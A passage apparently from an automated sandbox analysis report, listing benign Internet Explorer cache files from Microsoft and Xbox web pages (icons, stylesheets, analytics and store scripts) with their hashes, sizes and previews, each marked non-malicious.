                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" enable-background="new 0 0 72 56" xml:space="preserve">.<rect fill="#FFFFFF" width="72" height="56"/>.<g id="Deals">..<path fill="#107C10" d="M58.9,18.4c1.7,1.7,2.9,3.6,3.8,5.7c0.9,2.1,1.3,4.4,1.3,6.7s-0.4,4.6-1.3,6.7c-0.9,2.1-2.1,4-3.8,5.7...s-3.6,2.9-5.7,3.8c-2.1,0.9-4.4,1.3-6.7,1.3c-1.9,0-3.8-0.3-5.6-0.9s-3.4-1.5-4.9-2.6l-7,7l-21-21L32.5,6.2h21v8.4...c1,0.4,1.9,1,2.8,1.6C57.2,16.9,58.1,17.6,58.9,18.4z M29,46.8l21-21v-8.6c-0.6-0.1-1.1-0.3-1.7-0.3c-0.6-0.1-1.2-0.1-1.8-0.1h-1.8...c-0.5,0-0.9-0.2-1.2-0.5C43.2,15.9,43,15.5,43,15s0.2-0.9,0.5-1.2s0.8-0.5,1.2-0.5h1.8c1.2,0,2.4,0.1,3.5,0.4v-4H33.9l-21,21...L29,46.8z M46.5,44.8c1.9,0,3.7-0.4,5.4-1.1s3.2-1.7,4.4-3c1.3-1.3,2.3-2.7,3-4.4s1.1-3.5,1.1-5.4c0-1.3-0.2-2.5-0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\4873755a-8b1e-497e-bc54-101d1e75d3e7[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 960 x 540
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):89401
                                                                                                                                                                                                              Entropy (8bit):7.983830870854764
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:O0tlL9HAc5vZfgVMlebvdE3cuj5CZLJdu8tFgmkJVNfaghgZf6zGujvOdXCkKFCG:jfLR7XSdF7VtOmIVzXzn2dXysdKII0k
                                                                                                                                                                                                              MD5:B1F5B34FD4653ECC55A495B7A6A59B51
                                                                                                                                                                                                              SHA1:A3E0E79E99FE0614A67143206A4B91E6811AE61C
                                                                                                                                                                                                              SHA-256:2A38C4E7692EFECBF4B5F6EFD20DDBD3D77D2EDC91F8A76132431C6A068A6E41
                                                                                                                                                                                                              SHA-512:C67F0806499612281C4D03362CC459ACCC5254709FA351B8AFAA5F2C1509F723E465DEEE675ADF154B95A12F66A26C9B7B2D63C86BEF7B321D2C7E9CF41BE5C8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/4873755a-8b1e-497e-bc54-101d1e75d3e7.png
                                                                                                                                                                                                              Preview: GIF89a............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.....................!.......,............c..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is..8o...S.@.1...Jt..H.*M.t..P.J.Ju..X.j..u..`...Kv..h.M.v..p..Kw..x....(......<Xp...#^..q..!3..8...+c..3..As..9...K.^..5..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\52-7ec320[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):169165
                                                                                                                                                                                                              Entropy (8bit):5.043574839315944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxh:jlZAjLkJeTC
                                                                                                                                                                                                              MD5:FC80EE0EE4C1195A0A3573C1F22E53A8
                                                                                                                                                                                                              SHA1:82AEF853A84BE4A2C3684E67ED83F577DF61557A
                                                                                                                                                                                                              SHA-256:1B61B75684F6AC70F426526277CC6730A26CA157B7632FF0EB6A2DC4D15D94C8
                                                                                                                                                                                                              SHA-512:C367661A89582A133F88D6E141BAF95AF4C3DA42ED27954B856DD52B1D2593A9ED8B1EFE4BC176F845F5BD2FCDF14CEEA172AF7F68ACB334ADA871CD99F2BAFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/16-3b4837/cf-7f2b14/7b-5ab060/b2-7c2f2c/af-85090f/b0-adecbe/42-6d7c67/52-7ec320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\5f71df01-502d-46ad-87a9-26eefe403304[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):103694
                                                                                                                                                                                                              Entropy (8bit):5.595685909855981
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:WB75LBb2OEYVtQynymwqlXJZzdNWn7EPlGSR9D7nXCvU70ALci:WvLBb2OEYVtQynymwqlXJZzdNWn7EPlP
                                                                                                                                                                                                              MD5:1A7CAC4D31860247557228BED8BA72AD
                                                                                                                                                                                                              SHA1:0E3A612E06F6BDA11FBE33CB68562F095B488DE6
                                                                                                                                                                                                              SHA-256:4FC144DE58818340F0AD848C800B35F1EEB9964A991F6A229958460D77FAA636
                                                                                                                                                                                                              SHA-512:EB40CD50287C1B60240628A6D51AC9F1D3CF19E41C771838196DFC7BD592318443127664988D09EAB6371A66A4B26F3EE1CBB973A4825ED383538C7186CDFFF6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnssl.clicktale.net/pcc/5f71df01-502d-46ad-87a9-26eefe403304.js?DeploymentConfigName=Release_20210413&Version=4
                                                                                                                                                                                                              Preview: // Copyright 2006-2021 ClickTale Ltd., US Patent Pending....window.ClickTaleGlobal = window.ClickTaleGlobal || {};..window.ClickTaleSettings = window.ClickTaleSettings || {};....ClickTaleGlobal.init = ClickTaleGlobal.init || {};..ClickTaleGlobal.scripts = ClickTaleGlobal.scripts || {};....ClickTaleGlobal.scripts.filter = ClickTaleGlobal.scripts.filter || (function () {...var recordingThreshold = Math.random() * 100;.....return {....isRecordingApproved: function(percentage) {.....return recordingThreshold <= percentage;....}...}..})();.........// Copyright 2006-2021 ClickTale Ltd., US Patent Pending..// PID: 1002....var ctRules_PrePCC={"rules":"id|3ca9fd9f-e452-4cf6-bc48-97123c3494a7|name|CEC+Action+%7C+Xbox+HP+%7C+Clicked+on+Hero|type|ClickEvent|title|Click+Event|isActive|action|MultipleAction|children|CTEventAction|eventName|CEC+Action+%7C+Xbox+HP+%7C+Clicked+on+Hero|StaticEventNameAction|CEC+Action+%7C+Xbox+HP+%7C+Clicked+on+Hero|eventId|triggers|OrCondition|childConditions|ctSelecto
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\6211f0f8-ee91-4b1d-a19c-45d0155adcac[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                              Entropy (8bit):4.807507408334594
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvAvf3SB917YJlrhf2CP+LgQxM+lJBN8V7Oz:LvfG9y3hOCmcQxLDR
                                                                                                                                                                                                              MD5:E2BD1AB40EC099AE5028101EAEC07ACD
                                                                                                                                                                                                              SHA1:FB4052E6190A623A0CE2D4199259EF8DF89C7D8A
                                                                                                                                                                                                              SHA-256:2A6227F7332A79972581944AD829802C8DBAA0EF35A76C10879C34006A6337F1
                                                                                                                                                                                                              SHA-512:4AEDEC286BF781175D7CB257D7F32E5EF9B122E76349073AB745942B74CDCA827AF47BE56A1E8B22761BE493A0DFB4FE7401951898B13E705BA67E84DEBF833B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/62/11/6211f0f8-ee91-4b1d-a19c-45d0155adcac.svg?n=Homepage-FY20_Home-Icons-0_Accessories_72x56-01.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" enable-background="new 0 0 72 56" xml:space="preserve">.<rect fill="#FFFFFF" width="72" height="56"/>.<g id="Accessories">..<path fill="none" d="M18.2,45.8c0,0.5,0.2,0.9,0.5,1.3c0.4,0.4,0.8,0.5,1.3,0.5h1.8V33.3H20c-0.5,0-0.9,0.2-1.3,0.5...c-0.4,0.4-0.5,0.8-0.5,1.3V45.8z"/>..<path fill="none" d="M52,33.3h-1.8v14.3H52c0.5,0,0.9-0.2,1.3-0.5c0.4-0.4,0.5-0.8,0.5-1.3V35.1c0-0.5-0.2-0.9-0.5-1.3...C52.9,33.5,52.5,33.3,52,33.3z"/>..<path fill="#107C10" d="M56.5,20.6c-0.5-1.8-1.2-3.5-2.2-5.1c-0.9-1.6-2-3-3.3-4.3s-2.7-2.4-4.3-3.3s-3.3-1.6-5.1-2.2...C39.9,5.2,38,4.9,36,4.9s-3.9,0.3-5.7,0.8s-3.5,1.2-5.1,2.2c-1.6,0.9-3,2-4.3,3.3c-1.3,1.3-2.4,2.7-3.3,4.3s-1.6,3.3-2.2,5.1...c-0.5,1.8-0.8,3.7-0.8,5.7v19.6c0,0.7,0.1,1.4,0.4,2.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\89-144c00[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):134244
                                                                                                                                                                                                              Entropy (8bit):5.2269855120314705
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:UzUHQ9yA5slVjF55H7pxhX2OG+59gEkpCI+IX8BJWxFu209RhY8WOyd1EwgXA9GT:UzU4QpxJIS20y9d1EwgXA95KScDCE4kV
                                                                                                                                                                                                              MD5:E9EF5FD3CBFA17971DB5954607DE845C
                                                                                                                                                                                                              SHA1:925278D7EBC4CC6DDB01193B619DD5EDFF7F50B9
                                                                                                                                                                                                              SHA-256:021ACF64B3E3A768CC3B037E61135A74EE81870A4333DC40A12A8E7A8A00F163
                                                                                                                                                                                                              SHA-512:50F065A46AFAD111089E6BC8A1F0050EBB5B2AE79FD5100932B9DF96EA7428B438C2856B4C34BC259F9F59E45FDB6A89D564A85C916D4C22101090814435DC26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-storeexp-neu-ms-com.akamaized.net/store/_scrf/js/themes=store-web-default/2f-63ce8f/3a-2cfbda/12-f9cbf0/aa-dc1460/2d-7a9063/8b-b7e929/69-f75c22/ff-8418b5/e9-a27a19/8f-165e61/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/f8-73a5f2/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/91-97a04f/1f-100dea/33-abe4df/17-f90ef1/e3-082b89/7f-25cd1c/89-144c00?ver=2.0&_cf=02242021_3231
                                                                                                                                                                                                              Preview: var __extends,_requirejs,jsll;define("ajaxWithAnimation",["jqReady!","jsll"],function(n,t){var i=["<div class='c-progress f-indeterminate-","regional","' style='margin:","0","px auto' tabindex='0' role='progressbar'><span><\/span><span><\/span><span><\/span><span><\/span><span><\/span><\/div>"],u=function(t,r){var u=n(t),o,f,e;u.length&&(o=(r.loaderType||"").toUpperCase(),i[1]=o==="PROGRESS"||o==="PROGRESSBAR"?"regional":o==="SPINNERLARGE"?"local f-progress-large f-center":"local f-progress-small",r.margin&&r.margin.length&&(i[3]=r.margin),f=i.join(""),e=(r.loaderPosition||"").toUpperCase(),e==="TOP"||e==="BOTTOM"?(u.addClass("ajaxloader"),e==="BOTTOM"?u.append(f):u.prepend(f)):(u.parent().addClass("ajaxloader"),e==="BEFORE"?u.before(f):u.after(f)))},f=function(t,i){var r=n(t),u;r.length&&(u=(i.loaderPosition||"").toUpperCase(),u!=="TOP"&&u!=="BOTTOM"&&(r=r.parent()),r.removeClass("ajaxloader").children().remove(".c-progress"))},r=function(i){i.refreshElement&&u(i.refreshElement,i);var
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\8ce47433-434b-4487-b8da-1bd32429d3ca[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1606
                                                                                                                                                                                                              Entropy (8bit):4.699707223832915
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvAvf3SB2FKgCI9TSxCzILUyaRkVn9rJ7UL1dlHbM442LM:LvfGAH5nILjD+d5bMWM
                                                                                                                                                                                                              MD5:039282DF8C3E58B162FEDFE8F48194EE
                                                                                                                                                                                                              SHA1:93CBF098BB2ABF927C7CC2883CFB7E0CA2FF2D3A
                                                                                                                                                                                                              SHA-256:9537EFAA4771C112C144C2BA7919CDDDDB5F39A73372AFDB1358531B85587FB9
                                                                                                                                                                                                              SHA-512:90CC5D1950ACC90B003752BE0479B3027E21A0B3A254D1DEEC002CF5DB51C65CDF613BD02D6E84A96E592CC18440A344A6FC99D005F672BDA4F04031ABC09466
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/8c/e4/8ce47433-434b-4487-b8da-1bd32429d3ca.svg?n=Homepage-FY20_Home-Icons-0_Sign-In_72x56-01.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" enable-background="new 0 0 72 56" xml:space="preserve">.<rect fill="#FFFFFF" width="72" height="56"/>.<path id="Sign_in" fill="#107C10" d="M55.3,44.5c-0.6-2-1.5-3.8-2.7-5.5c-1.1-1.7-2.6-3.1-4.2-4.4c-1.5-1.1-3.1-2-4.9-2.7..c0.9-0.6,1.8-1.2,2.5-2c0.9-0.9,1.7-1.9,2.4-3c0.7-1.1,1.2-2.3,1.5-3.5c0.4-1.3,0.5-2.6,0.5-3.9c0-2-0.4-3.9-1.1-5.7..c-0.8-1.8-1.8-3.3-3.1-4.6c-1.3-1.3-2.9-2.4-4.6-3.1C39.9,5.3,38,4.9,36,4.9s-3.9,0.4-5.7,1.1c-1.8,0.8-3.3,1.8-4.6,3.1..c-1.3,1.3-2.4,2.9-3.1,4.6c-0.8,1.8-1.1,3.7-1.1,5.7c0,1.3,0.2,2.6,0.5,3.9c0.4,1.3,0.9,2.5,1.5,3.6c0.7,1.1,1.5,2.1,2.4,3..c0.8,0.7,1.6,1.4,2.6,2c-1.8,0.7-3.4,1.6-4.9,2.8c-1.6,1.3-3.1,2.7-4.2,4.4s-2.1,3.5-2.7,5.5c-0.6,2-0.9,4.1-0.9,6.2v0.3h3.5v-0.3..c0-1.5,0.2-3.1,0.6
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\94-3cd1e0[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):68375
                                                                                                                                                                                                              Entropy (8bit):5.370837839922446
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gtV81ICDVRgJhAiUinqgDRQ7wYv6uxhBANIu:gv81+einqgD8Q
                                                                                                                                                                                                              MD5:53475B50CF354A3E5CCBB0740A2AE553
                                                                                                                                                                                                              SHA1:9166969D9B0D89321B6BD0A754E3DEE54C2B7B11
                                                                                                                                                                                                              SHA-256:EEA90E1F236FD6CED5D08C19B424BC7D36A1679C3B87B71C560365AED4888FF3
                                                                                                                                                                                                              SHA-512:D53A98168F82CFDCC02CEF55D73EE40D4F1D32EDB8AC85256182D88F3609FEEAB7A5186B4527BC7B5AA77CB06930E324C8A56CB49F3CC71E1A02D5B539439637
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/mscomhp/_scrf/js/themes=default/78-6f121b/94-3cd1e0?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var awa,behaviorKey;define("jsllConfig",["rawJsllConfig"],function(n){return n});awa=awa||{};awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNITY:125,SOCIALFOLLOW:126,VOTE:140,SURVEYINITIATE:141,SURVEYCOMPLETE:142,REPORTAPPLICATION:143,REPORTREVIEW:144,SURV
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ErrorPageTemplate[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2168
                                                                                                                                                                                                              Entropy (8bit):5.207912016937144
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                                                              MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                                                              SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                                                              SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                                                              SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\MWFMDL2-Xbox[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):100898
                                                                                                                                                                                                              Entropy (8bit):6.005625423708649
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:JZoBbFo1PvyUW6HHObtacAtB/Lb/Qxb+2Zy:fnW6HHKta/P/Lb/QxbFZy
                                                                                                                                                                                                              MD5:E6684C39227948E823B36FE249FDF9DF
                                                                                                                                                                                                              SHA1:7080AD6AF58EB68F614EFBA7FEF49B56E9080351
                                                                                                                                                                                                              SHA-256:F61EA31509731E06A931C9DF69B1A4A2EBAD052D7E716A967CC2AE7314F49F09
                                                                                                                                                                                                              SHA-512:B42B43BF7122B78EDACFB7742ECC1E861A92FDDD93430CDFAE2A82F02D88244F16C46B76893A9D9DB9AEC0EF60709BBF754F9A19AED07FE9ABA7268F11B47E38
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/fonts/MWFMDL2-Xbox.css
                                                                                                                                                                                                              Preview: @font-face {. font-family: 'MWFMDL2-Xbox';. src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAHvwABAAAAABVrAAAHuNAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACLXAhWCYg/EQgKhNw8hK8GC4NuAAE2AiQDh1gEIAWULAeTJQyENVvwPJGvm8yt6nVEEI/vr0o3GZDXbdf3fEEZK9g2jXq3UyENgtOzkKZuysns/////////z89qYhsbbqlXbf/5+OgIKgqRO4uQadQmmSoCEhNCil9xDJarkN8kSTadkTTBljkcmzzmgtkoVQXPf3sDYQioKJefIRMSNOBgkIrhYhC63QHTUjabzDHuu4ga7npVdMyqVKIryUONU0J+3RLQ6zgbuBMPdbV4aAOSrgbXVjokEaqG96E1W0FWJtv8kGqT3kg0vBE3cByK3QVgLgZWHw0MKT5LtR+Fad2ytdLDx+Ls+wb0j4q+oZeb67yQ1LScIGkITGLZTupEydmPVvA0IduMlEskBUkpCUQK9oh8cCs5/2CiywNuIsDtxB6ud9ytDhksWke+B6wV3CD3bKjqOf8hU110FQCOg4Di81FSGNU92dmhf+QuNtZwaP6Ux4qtPvri6pJIAo1TW/oBZ+X//6nz8o3vcFksW/zIrBxGSNZ6dbLw//P/ec+ST5wBgjPkGYssPFA0WPryLXCv6ohYW6Bb8Ehqq7/8+9m/bk3QhBrCRZCmQZpUjptUk3Bq2GXDhUlI5ZORu8KK5bZWWGfqH652v+qVgIEwYBAkJJDU7tz5/z6u8egsLuKI+3mCdIIwHcgW9HuNqc5XQpJM06haAz98zlfx3CfFLTDDjsA7MQK4Mplh1X+nxOWSzoFohUQqkSwJJAv7afJwBHeh/b+wCE4AMgNWUjUlVUqVXu9kdJs3Ibn3dZjKKamIA7E
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\MWF_SocialFacebook.png[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):469
                                                                                                                                                                                                              Entropy (8bit):5.368803468427014
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:tvG1W3aA/QU2Z9Vflb9WbrCrfdo97LCcnwiA:tu1UQZ9/b9WbejSVwiA
                                                                                                                                                                                                              MD5:58064C0EDB5F8C89D1C066A50AF5ED7D
                                                                                                                                                                                                              SHA1:CB7B81145B59B505B74ED3507464201AB4BFF621
                                                                                                                                                                                                              SHA-256:6CD47E002200FC07167C3D1552C5E84693412784AE15B039383F4607A6DB08E7
                                                                                                                                                                                                              SHA-512:11A214A9A9DF47901D5BE6F867A7A2E739825CE12F98FD28755C16ADF1AEF1783E4082C6F89D9D522823458AFFC9CD60D070C27352E88A0A24F70545C17B340E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/MWF_SocialFacebook.png.svg?version=ca2b09b7-dabe-cbfb-0459-457c6ac59270
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><defs><style>.cls-1{fill:none;}.cls-2{fill:#231f20;}</style></defs><title>Facebook-neutral</title><rect class="cls-1" width="32" height="32"/><g id="_Group_" data-name="&lt;Group&gt;"><path class="cls-2" d="M17.53,26H13V16H11V13h2V10.48a4.76,4.76,0,0,1,1.21-3.29A5,5,0,0,1,17.88,6H21V9H18.91a1.5,1.5,0,0,0-1.17.57,3.53,3.53,0,0,0-.2,1.37V13h3.12l-0.36,3H17.53V26Z"/></g></svg>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\MWF_SocialTwitter.png[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                              Entropy (8bit):4.81890078988595
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:tvG1W3aA/QvZ2Z9VflbHM/dGmJr41PPhtUBaw7+Us5HQluq4hJ1fJY4fC2m:tu1UFZ9/ba01HIBRXMw4qgJ1fy4tm
                                                                                                                                                                                                              MD5:8724142EB655D2FD1BD91E144CB42B40
                                                                                                                                                                                                              SHA1:69812DA7793FB4D1314DEADB3CC2663E871B5071
                                                                                                                                                                                                              SHA-256:05AC6FDA6095A72ED257E3EB7548D0EADAF95D2BB9632145A03DD1EBC7A0D197
                                                                                                                                                                                                              SHA-512:8435F66F684E50C81E126C52DDDD4DBCA96E148274346021BC92D5A0803D69ED6DE0ABAD010A2D12B23A0EE549DE65D9BE87BDA8030CBB796F667B4363FF3975
                                                                                                                                                                                                              Malicious:false
